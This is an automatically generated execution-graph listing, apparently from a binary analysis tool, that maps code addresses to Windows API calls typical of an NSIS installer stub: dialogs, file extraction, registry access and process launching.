                                                execution_graph 3236 401bc0 3237 401c11 3236->3237 3243 401bcd 3236->3243 3239 401c16 3237->3239 3240 401c3b GlobalAlloc 3237->3240 3238 4023af 3242 40657e 21 API calls 3238->3242 3250 401c56 3239->3250 3274 406541 lstrcpynW 3239->3274 3255 40657e 3240->3255 3245 4023bc 3242->3245 3243->3238 3246 401be4 3243->3246 3275 405ba1 3245->3275 3272 406541 lstrcpynW 3246->3272 3247 401c28 GlobalFree 3247->3250 3251 401bf3 3273 406541 lstrcpynW 3251->3273 3253 401c02 3279 406541 lstrcpynW 3253->3279 3270 406589 3255->3270 3256 4067d0 3257 4067e9 3256->3257 3302 406541 lstrcpynW 3256->3302 3257->3250 3259 4067a1 lstrlenW 3259->3270 3263 40669a GetSystemDirectoryW 3263->3270 3264 40657e 15 API calls 3264->3259 3265 4066b0 GetWindowsDirectoryW 3265->3270 3266 406742 lstrcatW 3266->3270 3268 40657e 15 API calls 3268->3270 3270->3256 3270->3259 3270->3263 3270->3264 3270->3265 3270->3266 3270->3268 3271 406712 SHGetPathFromIDListW CoTaskMemFree 3270->3271 3280 40640f 3270->3280 3285 406935 GetModuleHandleA 3270->3285 3291 4067ef 3270->3291 3300 406488 wsprintfW 3270->3300 3301 406541 lstrcpynW 3270->3301 3271->3270 3272->3251 3273->3253 3274->3247 3276 405bb6 3275->3276 3277 405c02 3276->3277 3278 405bca MessageBoxIndirectW 3276->3278 3277->3250 3278->3277 3279->3250 3303 4063ae 3280->3303 3283 406443 RegQueryValueExW RegCloseKey 3284 406473 3283->3284 3284->3270 3286 406951 3285->3286 3287 40695b GetProcAddress 3285->3287 3307 4068c5 GetSystemDirectoryW 3286->3307 3289 40696a 3287->3289 3289->3270 3290 406957 3290->3287 3290->3289 3292 4067fc 3291->3292 3294 406865 CharNextW 3292->3294 3295 406872 3292->3295 3298 406851 CharNextW 3292->3298 3299 406860 CharNextW 3292->3299 3310 405e3d 3292->3310 3293 406877 CharPrevW 3293->3295 3294->3292 3294->3295 3295->3293 3296 406898 3295->3296 3296->3270 3298->3292 3299->3294 3300->3270 3301->3270 3302->3257 3304 4063bd 3303->3304 3305 4063c6 RegOpenKeyExW 3304->3305 3306 4063c1 3304->3306 3305->3306 3306->3283 3306->3284 3308 4068e7 wsprintfW LoadLibraryExW 3307->3308 3308->3290 3311 405e43 3310->3311 3312 405e59 3311->3312 3313 405e4a CharNextW 3311->3313 3312->3292 3313->3311 3314 403fc1 3315 403fd9 3314->3315 3316 40413a 3314->3316 3315->3316 3317 403fe5 3315->3317 3318 40418b 3316->3318 3319 40414b GetDlgItem GetDlgItem 3316->3319 3320 403ff0 SetWindowPos 3317->3320 3321 404003 3317->3321 3323 4041e5 3318->3323 3334 401389 2 API calls 3318->3334 3322 4044c0 22 API calls 3319->3322 3320->3321 3325 40400c ShowWindow 3321->3325 3326 40404e 3321->3326 3327 404175 SetClassLongW 3322->3327 3328 404135 3323->3328 3387 40450c 3323->3387 3329 404127 3325->3329 3330 40402c GetWindowLongW 3325->3330 3331 404056 DestroyWindow 3326->3331 3332 40406d 3326->3332 3333 40140b 2 API calls 3327->3333 3409 404527 3329->3409 3330->3329 3336 404045 ShowWindow 3330->3336 3386 404449 3331->3386 3337 404072 SetWindowLongW 3332->3337 3338 404083 3332->3338 3333->3318 3339 4041bd 3334->3339 3336->3326 3337->3328 3338->3329 3342 40408f GetDlgItem 3338->3342 3339->3323 3343 4041c1 SendMessageW 3339->3343 3340 40140b 2 API calls 3356 4041f7 3340->3356 3341 40444b DestroyWindow EndDialog 3341->3386 3345 4040a0 SendMessageW IsWindowEnabled 3342->3345 3346 4040bd 3342->3346 3343->3328 3344 40447a ShowWindow 3344->3328 3345->3328 3345->3346 3348 4040ca 3346->3348 3349 404111 SendMessageW 3346->3349 3350 4040dd 3346->3350 3359 4040c2 3346->3359 3347 40657e 21 API calls 3347->3356 3348->3349 3348->3359 3349->3329 3353 4040e5 3350->3353 3354 4040fa 3350->3354 3352 4044c0 22 API calls 3352->3356 3403 40140b 3353->3403 3358 40140b 2 API calls 3354->3358 3355 4040f8 3355->3329 3356->3328 3356->3340 3356->3341 3356->3347 3356->3352 3377 40438b DestroyWindow 3356->3377 3390 4044c0 3356->3390 3360 404101 3358->3360 3406 404499 3359->3406 3360->3329 3360->3359 3362 404272 GetDlgItem 3363 404287 3362->3363 3364 40428f ShowWindow KiUserCallbackDispatcher 3362->3364 3363->3364 3393 4044e2 KiUserCallbackDispatcher 3364->3393 3366 4042b9 EnableWindow 3371 4042cd 3366->3371 3367 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3368 404302 SendMessageW 3367->3368 3367->3371 3368->3371 3371->3367 3394 4044f5 SendMessageW 3371->3394 3395 403fa2 3371->3395 3398 406541 lstrcpynW 3371->3398 3373 404331 lstrlenW 3374 40657e 21 API calls 3373->3374 3375 404347 SetWindowTextW 3374->3375 3399 401389 3375->3399 3378 4043a5 CreateDialogParamW 3377->3378 3377->3386 3379 4043d8 3378->3379 3378->3386 3380 4044c0 22 API calls 3379->3380 3381 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3380->3381 3382 401389 2 API calls 3381->3382 3383 404429 3382->3383 3383->3328 3384 404431 ShowWindow 3383->3384 3385 40450c SendMessageW 3384->3385 3385->3386 3386->3328 3386->3344 3388 404524 3387->3388 3389 404515 SendMessageW 3387->3389 3388->3356 3389->3388 3391 40657e 21 API calls 3390->3391 3392 4044cb SetDlgItemTextW 3391->3392 3392->3362 3393->3366 3394->3371 3396 40657e 21 API calls 3395->3396 3397 403fb0 SetWindowTextW 3396->3397 3397->3371 3398->3373 3401 401390 3399->3401 3400 4013fe 3400->3356 3401->3400 3402 4013cb MulDiv SendMessageW 3401->3402 3402->3401 3404 401389 2 API calls 3403->3404 3405 401420 3404->3405 3405->3359 3407 4044a0 3406->3407 3408 4044a6 SendMessageW 3406->3408 3407->3408 3408->3355 3410 4045ea 3409->3410 3411 40453f GetWindowLongW 3409->3411 3410->3328 3411->3410 3412 404554 3411->3412 3412->3410 3413 404581 GetSysColor 3412->3413 3414 404584 3412->3414 3413->3414 3415 404594 SetBkMode 3414->3415 3416 40458a SetTextColor 3414->3416 3417 4045b2 3415->3417 3418 4045ac GetSysColor 3415->3418 3416->3415 3419 4045c3 3417->3419 3420 4045b9 SetBkColor 3417->3420 3418->3417 3419->3410 3421 4045d6 DeleteObject 3419->3421 3422 4045dd CreateBrushIndirect 3419->3422 3420->3419 3421->3422 3422->3410 4027 402641 4028 402dcb 21 API calls 4027->4028 4029 402648 4028->4029 4032 406031 GetFileAttributesW CreateFileW 4029->4032 4031 402654 4032->4031 4040 4025c3 4050 402e0b 4040->4050 4043 402da9 21 API calls 4044 4025d6 4043->4044 4045 4025f2 RegEnumKeyW 4044->4045 4046 4025fe RegEnumValueW 4044->4046 4048 402953 4044->4048 4047 402613 RegCloseKey 4045->4047 4046->4047 4047->4048 4051 402dcb 21 API calls 4050->4051 4052 402e22 4051->4052 4053 4063ae RegOpenKeyExW 4052->4053 4054 4025cd 4053->4054 4054->4043 3631 4015c8 3632 402dcb 21 API calls 3631->3632 3633 4015cf SetFileAttributesW 3632->3633 3634 4015e1 3633->3634 3640 401fc9 3641 402dcb 21 API calls 3640->3641 3642 401fcf 3641->3642 3643 4055c6 28 API calls 3642->3643 3644 401fd9 3643->3644 3655 405b24 CreateProcessW 3644->3655 3647 402002 CloseHandle 3651 402953 3647->3651 3650 401ff4 3652 402004 3650->3652 3653 401ff9 3650->3653 3652->3647 3663 406488 wsprintfW 3653->3663 3656 401fdf 3655->3656 3657 405b57 CloseHandle 3655->3657 3656->3647 3656->3651 3658 4069e0 WaitForSingleObject 3656->3658 3657->3656 3659 4069fa 3658->3659 3660 406a0c GetExitCodeProcess 3659->3660 3664 406971 3659->3664 3660->3650 3663->3647 3665 40698e PeekMessageW 3664->3665 3666 406984 DispatchMessageW 3665->3666 3667 40699e WaitForSingleObject 3665->3667 3666->3665 3667->3659 4058 40204f 4059 402dcb 21 API calls 4058->4059 4060 402056 4059->4060 4061 406935 5 API calls 4060->4061 4062 402065 4061->4062 4063 402081 GlobalAlloc 4062->4063 4064 4020f1 4062->4064 4063->4064 4065 402095 4063->4065 4066 406935 5 API calls 4065->4066 4067 40209c 4066->4067 4068 406935 5 API calls 4067->4068 4069 4020a6 4068->4069 4069->4064 4073 406488 wsprintfW 4069->4073 4071 4020df 4074 406488 wsprintfW 4071->4074 4073->4071 4074->4064 4075 40254f 4076 402e0b 21 API calls 4075->4076 4077 402559 4076->4077 4078 402dcb 21 API calls 4077->4078 4079 402562 4078->4079 4080 40256d RegQueryValueExW 4079->4080 4085 402953 4079->4085 4081 402593 RegCloseKey 4080->4081 4082 40258d 4080->4082 4081->4085 4082->4081 4086 406488 wsprintfW 4082->4086 4086->4081 4087 4021cf 4088 402dcb 21 API calls 4087->4088 4089 4021d6 4088->4089 4090 402dcb 21 API calls 4089->4090 4091 4021e0 4090->4091 4092 402dcb 21 API calls 4091->4092 4093 4021ea 4092->4093 4094 402dcb 21 API calls 4093->4094 4095 4021f4 4094->4095 4096 402dcb 21 API calls 4095->4096 4097 4021fe 4096->4097 4098 40223d CoCreateInstance 4097->4098 4099 402dcb 21 API calls 4097->4099 4102 40225c 4098->4102 4099->4098 4100 401423 28 API calls 4101 40231b 4100->4101 4102->4100 4102->4101 4103 403bd1 4104 403bdc 4103->4104 4105 403be3 GlobalAlloc 4104->4105 4106 403be0 4104->4106 4105->4106 4114 401a55 4115 402dcb 21 API calls 4114->4115 4116 401a5e ExpandEnvironmentStringsW 4115->4116 4117 401a72 4116->4117 4118 401a85 4116->4118 4117->4118 4119 401a77 lstrcmpW 4117->4119 4119->4118 4120 4014d7 4121 402da9 21 API calls 4120->4121 4122 4014dd Sleep 4121->4122 4124 402c4f 4122->4124 4130 4023d7 4131 4023df 4130->4131 4134 4023e5 4130->4134 4132 402dcb 21 API calls 4131->4132 4132->4134 4133 4023f3 4136 402401 4133->4136 4137 402dcb 21 API calls 4133->4137 4134->4133 4135 402dcb 21 API calls 4134->4135 4135->4133 4138 402dcb 21 API calls 4136->4138 4137->4136 4139 40240a WritePrivateProfileStringW 4138->4139 4140 402459 4141 402461 4140->4141 4142 40248c 4140->4142 4143 402e0b 21 API calls 4141->4143 4144 402dcb 21 API calls 4142->4144 4145 402468 4143->4145 4146 402493 4144->4146 4148 402dcb 21 API calls 4145->4148 4150 4024a0 4145->4150 4151 402e89 4146->4151 4149 402479 RegDeleteValueW RegCloseKey 4148->4149 4149->4150 4152 402e9d 4151->4152 4153 402e96 4151->4153 4152->4153 4155 402ece 4152->4155 4153->4150 4156 4063ae RegOpenKeyExW 4155->4156 4158 402efc 4156->4158 4157 402fa6 4157->4153 4158->4157 4159 402f0c RegEnumValueW 4158->4159 4163 402f2f 4158->4163 4160 402f96 RegCloseKey 4159->4160 4159->4163 4160->4157 4161 402f6b RegEnumKeyW 4162 402f74 RegCloseKey 4161->4162 4161->4163 4164 406935 5 API calls 4162->4164 4163->4160 4163->4161 4163->4162 4165 402ece 6 API calls 4163->4165 4166 402f84 4164->4166 4165->4163 4166->4157 4167 402f88 RegDeleteKeyW 4166->4167 4167->4157 4168 40175a 4169 402dcb 21 API calls 4168->4169 4170 401761 SearchPathW 4169->4170 4171 40177c 4170->4171 4172 401d5d 4173 402da9 21 API calls 4172->4173 4174 401d64 4173->4174 4175 402da9 21 API calls 4174->4175 4176 401d70 GetDlgItem 4175->4176 4177 40265d 4176->4177 4178 406c5f 4184 406ae3 4178->4184 4179 40744e 4180 406b64 GlobalFree 4181 406b6d GlobalAlloc 4180->4181 4181->4179 4181->4184 4182 406be4 GlobalAlloc 4182->4179 4182->4184 4183 406bdb GlobalFree 4183->4182 4184->4179 4184->4180 4184->4181 4184->4182 4184->4183 4185 402663 4186 402692 4185->4186 4187 402677 4185->4187 4189 4026c2 4186->4189 4190 402697 4186->4190 4188 402da9 21 API calls 4187->4188 4199 40267e 4188->4199 4192 402dcb 21 API calls 4189->4192 4191 402dcb 21 API calls 4190->4191 4193 40269e 4191->4193 4194 4026c9 lstrlenW 4192->4194 4202 406563 WideCharToMultiByte 4193->4202 4194->4199 4196 4026b2 lstrlenA 4196->4199 4197 4026f6 4198 40270c 4197->4198 4200 4060e3 WriteFile 4197->4200 4199->4197 4199->4198 4203 406112 SetFilePointer 4199->4203 4200->4198 4202->4196 4204 40612e 4203->4204 4205 406146 4203->4205 4206 4060b4 ReadFile 4204->4206 4205->4197 4207 40613a 4206->4207 4207->4205 4208 406177 SetFilePointer 4207->4208 4209 40614f SetFilePointer 4207->4209 4208->4205 4209->4208 4210 40615a 4209->4210 4211 4060e3 WriteFile 4210->4211 4211->4205 3592 4015e6 3593 402dcb 21 API calls 3592->3593 3594 4015ed 3593->3594 3612 405ebb CharNextW CharNextW 3594->3612 3596 401656 3598 401688 3596->3598 3599 40165b 3596->3599 3597 405e3d CharNextW 3605 4015f6 3597->3605 3602 401423 28 API calls 3598->3602 3618 401423 3599->3618 3609 401680 3602->3609 3605->3596 3605->3597 3608 40163c GetFileAttributesW 3605->3608 3610 40161f 3605->3610 3622 405b0c 3605->3622 3628 405aef CreateDirectoryW 3605->3628 3607 40166f SetCurrentDirectoryW 3607->3609 3608->3605 3610->3605 3625 405a95 CreateDirectoryW 3610->3625 3613 405ed8 3612->3613 3615 405eea 3612->3615 3614 405ee5 CharNextW 3613->3614 3613->3615 3617 405f0e 3614->3617 3616 405e3d CharNextW 3615->3616 3615->3617 3616->3615 3617->3605 3619 4055c6 28 API calls 3618->3619 3620 401431 3619->3620 3621 406541 lstrcpynW 3620->3621 3621->3607 3623 406935 5 API calls 3622->3623 3624 405b13 3623->3624 3624->3605 3626 405ae1 3625->3626 3627 405ae5 GetLastError 3625->3627 3626->3610 3627->3626 3629 405b03 GetLastError 3628->3629 3630 405aff 3628->3630 3629->3630 3630->3605 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4232 401cfd 4229->4232 4231 401cb1 4230->4231 4233 402da9 21 API calls 4231->4233 4234 402dcb 21 API calls 4232->4234 4235 401cbd 4233->4235 4236 401d06 FindWindowExW 4234->4236 4237 401ce8 SendMessageW 4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4257 4049ac 4254->4257 4256 404987 SetDlgItemTextW 4255->4256 4256->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4264 40689e 2 API calls 4261->4264 4261->4267 4262 401748 GetShortPathNameW 4263 402c4f 4262->4263 4265 401723 4264->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4263 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4287 4029c5 GlobalAlloc 4285->4287 4288 402a48 4285->4288 4289 402a67 DeleteFileW 4286->4289 4290 402a7a 4286->4290 4287->4288 4291 4029de 4287->4291 4292 4032d9 39 API calls 4288->4292 4289->4290 4306 4034d4 SetFilePointer 4291->4306 4294 402a55 CloseHandle 4292->4294 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4288 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 4021c1 4314->4315 4316 40210f 4314->4316 4319 401423 28 API calls 4315->4319 4317 402dcb 21 API calls 4316->4317 4318 402116 4317->4318 4320 402dcb 21 API calls 4318->4320 4324 40231b 4319->4324 4321 40211f 4320->4321 4322 402135 LoadLibraryExW 4321->4322 4323 402127 GetModuleHandleW 4321->4323 4322->4315 4325 402146 4322->4325 4323->4322 4323->4325 4334 4069a4 4325->4334 4328 402190 4331 4055c6 28 API calls 4328->4331 4329 402157 4330 402167 4329->4330 4332 401423 28 API calls 4329->4332 4330->4324 4333 4021b3 FreeLibrary 4330->4333 4331->4330 4332->4330 4333->4324 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4345 402da9 21 API calls 4342->4345 4348 402bce 4342->4348 4344 402bd7 4343->4344 4346 402dcb 21 API calls 4344->4346 4347 402b93 4345->4347 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4373 4047b1 4366->4373 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 40483f 4370->4372 4377 4048a6 4370->4377 4375 4046fe 4371->4375 4372->4377 4381 404865 SendMessageW LoadCursorW SetCursor 4372->4381 4373->4368 4373->4369 4374 4047ec GetDlgItem SendMessageW 4373->4374 4399 4044e2 KiUserCallbackDispatcher 4374->4399 4379 4044c0 22 API calls 4375->4379 4380 4048e0 4376->4380 4377->4369 4382 4048b8 4377->4382 4384 40470b CheckDlgButton 4379->4384 4403 40492e 4381->4403 4386 4048ce 4382->4386 4387 4048be SendMessageW 4382->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4380 4388 4048d4 SendMessageW 4386->4388 4387->4386 4388->4380 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4380 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4377 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4427 402953 4420->4427 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4426 40657e 21 API calls 4424->4426 4428 402da9 21 API calls 4425->4428 4426->4431 4428->4431 4431->4427 4433 406488 wsprintfW 4431->4433 4432->4427 4433->4427 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 3423 401f03 3431 402da9 3423->3431 3425 401f09 3426 402da9 21 API calls 3425->3426 3427 401f15 3426->3427 3428 401f21 ShowWindow 3427->3428 3429 401f2c EnableWindow 3427->3429 3430 402c4f 3428->3430 3429->3430 3432 40657e 21 API calls 3431->3432 3433 402dbe 3432->3433 3433->3425 4443 401503 4444 401508 4443->4444 4446 40152e 4443->4446 4445 402da9 21 API calls 4444->4445 4445->4446 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4450 402921 4448->4450 4449->4450 4451 402968 4449->4451 4453 406541 lstrcpynW 4451->4453 4453->4450 3537 405705 3538 405726 GetDlgItem GetDlgItem GetDlgItem 3537->3538 3539 4058af 3537->3539 3582 4044f5 SendMessageW 3538->3582 3541 4058e0 3539->3541 3542 4058b8 GetDlgItem CreateThread CloseHandle 3539->3542 3544 40590b 3541->3544 3545 405930 3541->3545 3546 4058f7 ShowWindow ShowWindow 3541->3546 3542->3541 3585 405699 OleInitialize 3542->3585 3543 405796 3549 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3543->3549 3547 40596b 3544->3547 3551 405945 ShowWindow 3544->3551 3552 40591f 3544->3552 3548 404527 8 API calls 3545->3548 3584 4044f5 SendMessageW 3546->3584 3547->3545 3557 405979 SendMessageW 3547->3557 3564 40593e 3548->3564 3555 40580b 3549->3555 3556 4057ef SendMessageW SendMessageW 3549->3556 3553 405965 3551->3553 3554 405957 3551->3554 3558 404499 SendMessageW 3552->3558 3560 404499 SendMessageW 3553->3560 3559 4055c6 28 API calls 3554->3559 3561 405810 SendMessageW 3555->3561 3562 40581e 3555->3562 3556->3555 3563 405992 CreatePopupMenu 3557->3563 3557->3564 3558->3545 3559->3553 3560->3547 3561->3562 3566 4044c0 22 API calls 3562->3566 3565 40657e 21 API calls 3563->3565 3567 4059a2 AppendMenuW 3565->3567 3568 40582e 3566->3568 3569 4059d2 TrackPopupMenu 3567->3569 3570 4059bf GetWindowRect 3567->3570 3571 405837 ShowWindow 3568->3571 3572 40586b GetDlgItem SendMessageW 3568->3572 3569->3564 3574 4059ed 3569->3574 3570->3569 3575 40585a 3571->3575 3576 40584d ShowWindow 3571->3576 3572->3564 3573 405892 SendMessageW SendMessageW 3572->3573 3573->3564 3577 405a09 SendMessageW 3574->3577 3583 4044f5 SendMessageW 3575->3583 3576->3575 3577->3577 3578 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3577->3578 3580 405a4b SendMessageW 3578->3580 3580->3580 3581 405a74 GlobalUnlock SetClipboardData CloseClipboard 3580->3581 3581->3564 3582->3543 3583->3572 3584->3544 3586 40450c SendMessageW 3585->3586 3590 4056bc 3586->3590 3587 4056e3 3588 40450c SendMessageW 3587->3588 3589 4056f5 CoUninitialize 3588->3589 3590->3587 3591 401389 2 API calls 3590->3591 3591->3590 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d49 4459->4461 4464 404d50 SendMessageW 4459->4464 4460 404d24 SendMessageW 4460->4455 4462 40140b 2 API calls 4461->4462 4462->4464 4464->4458 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4502 402720 4495->4502 4496 40276a ReadFile 4496->4502 4506 40285d 4496->4506 4497 4060b4 ReadFile 4497->4502 4498 4027aa MultiByteToWideChar 4498->4502 4499 40285f 4507 406488 wsprintfW 4499->4507 4500 406112 5 API calls 4500->4502 4502->4496 4502->4497 4502->4498 4502->4499 4502->4500 4503 4027d0 SetFilePointer MultiByteToWideChar 4502->4503 4504 402870 4502->4504 4502->4506 4503->4502 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3434 401794 3472 402dcb 3434->3472 3436 40179b 3437 4017c3 3436->3437 3438 4017bb 3436->3438 3515 406541 lstrcpynW 3437->3515 3514 406541 lstrcpynW 3438->3514 3441 4017c1 3445 4067ef 5 API calls 3441->3445 3442 4017ce 3516 405e10 lstrlenW CharPrevW 3442->3516 3461 4017e0 3445->3461 3449 4017f2 CompareFileTime 3449->3461 3450 4018b2 3482 4055c6 3450->3482 3451 401889 3454 4055c6 28 API calls 3451->3454 3463 40189e 3451->3463 3454->3463 3455 406541 lstrcpynW 3455->3461 3458 4018e3 SetFileTime 3460 4018f5 CloseHandle 3458->3460 3459 40657e 21 API calls 3459->3461 3462 401906 3460->3462 3460->3463 3461->3449 3461->3450 3461->3451 3461->3455 3461->3459 3468 405ba1 MessageBoxIndirectW 3461->3468 3478 40600c GetFileAttributesW 3461->3478 3481 406031 GetFileAttributesW CreateFileW 3461->3481 3519 40689e FindFirstFileW 3461->3519 3464 40190b 3462->3464 3465 40191e 3462->3465 3466 40657e 21 API calls 3464->3466 3467 40657e 21 API calls 3465->3467 3469 401913 lstrcatW 3466->3469 3470 401926 3467->3470 3468->3461 3469->3470 3471 405ba1 MessageBoxIndirectW 3470->3471 3471->3463 3473 402dd7 3472->3473 3474 40657e 21 API calls 3473->3474 3475 402df8 3474->3475 3476 402e04 3475->3476 3477 4067ef 5 API calls 3475->3477 3476->3436 3477->3476 3479 40602b 3478->3479 3480 40601e SetFileAttributesW 3478->3480 3479->3461 3480->3479 3481->3461 3483 4055e1 3482->3483 3492 4018bc 3482->3492 3484 4055fd lstrlenW 3483->3484 3485 40657e 21 API calls 3483->3485 3486 405626 3484->3486 3487 40560b lstrlenW 3484->3487 3485->3484 3489 405639 3486->3489 3490 40562c SetWindowTextW 3486->3490 3488 40561d lstrcatW 3487->3488 3487->3492 3488->3486 3491 40563f SendMessageW SendMessageW SendMessageW 3489->3491 3489->3492 3490->3489 3491->3492 3493 4032d9 3492->3493 3494 4032f2 3493->3494 3495 40331d 3494->3495 3534 4034d4 SetFilePointer 3494->3534 3522 4034be 3495->3522 3499 40333a GetTickCount 3510 40334d 3499->3510 3500 40345e 3501 403462 3500->3501 3506 40347a 3500->3506 3503 4034be ReadFile 3501->3503 3502 4018cf 3502->3458 3502->3460 3503->3502 3504 4034be ReadFile 3504->3506 3505 4034be ReadFile 3505->3510 3506->3502 3506->3504 3507 4060e3 WriteFile 3506->3507 3507->3506 3509 4033b3 GetTickCount 3509->3510 3510->3502 3510->3505 3510->3509 3511 4033dc MulDiv wsprintfW 3510->3511 3525 406ab0 3510->3525 3532 4060e3 WriteFile 3510->3532 3512 4055c6 28 API calls 3511->3512 3512->3510 3514->3441 3515->3442 3517 4017d4 lstrcatW 3516->3517 3518 405e2c lstrcatW 3516->3518 3517->3441 3518->3517 3520 4068b4 FindClose 3519->3520 3521 4068bf 3519->3521 3520->3521 3521->3461 3535 4060b4 ReadFile 3522->3535 3526 406ad5 3525->3526 3527 406add 3525->3527 3526->3510 3527->3526 3528 406b64 GlobalFree 3527->3528 3529 406b6d GlobalAlloc 3527->3529 3530 406be4 GlobalAlloc 3527->3530 3531 406bdb GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 406101 3532->3533 3533->3510 3534->3495 3536 403328 3535->3536 3536->3499 3536->3500 3536->3502 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 3635 401598 3636 4015b1 3635->3636 3637 4015a8 ShowWindow 3635->3637 3638 402c4f 3636->3638 3639 4015bf ShowWindow 3636->3639 3637->3636 3639->3638 4530 402419 4531 402dcb 21 API calls 4530->4531 4532 402428 4531->4532 4533 402dcb 21 API calls 4532->4533 4534 402431 4533->4534 4535 402dcb 21 API calls 4534->4535 4536 40243b GetPrivateProfileStringW 4535->4536 4537 40201b 4538 402dcb 21 API calls 4537->4538 4539 402022 4538->4539 4540 40689e 2 API calls 4539->4540 4541 402028 4540->4541 4543 402039 4541->4543 4544 406488 wsprintfW 4541->4544 4544->4543 3668 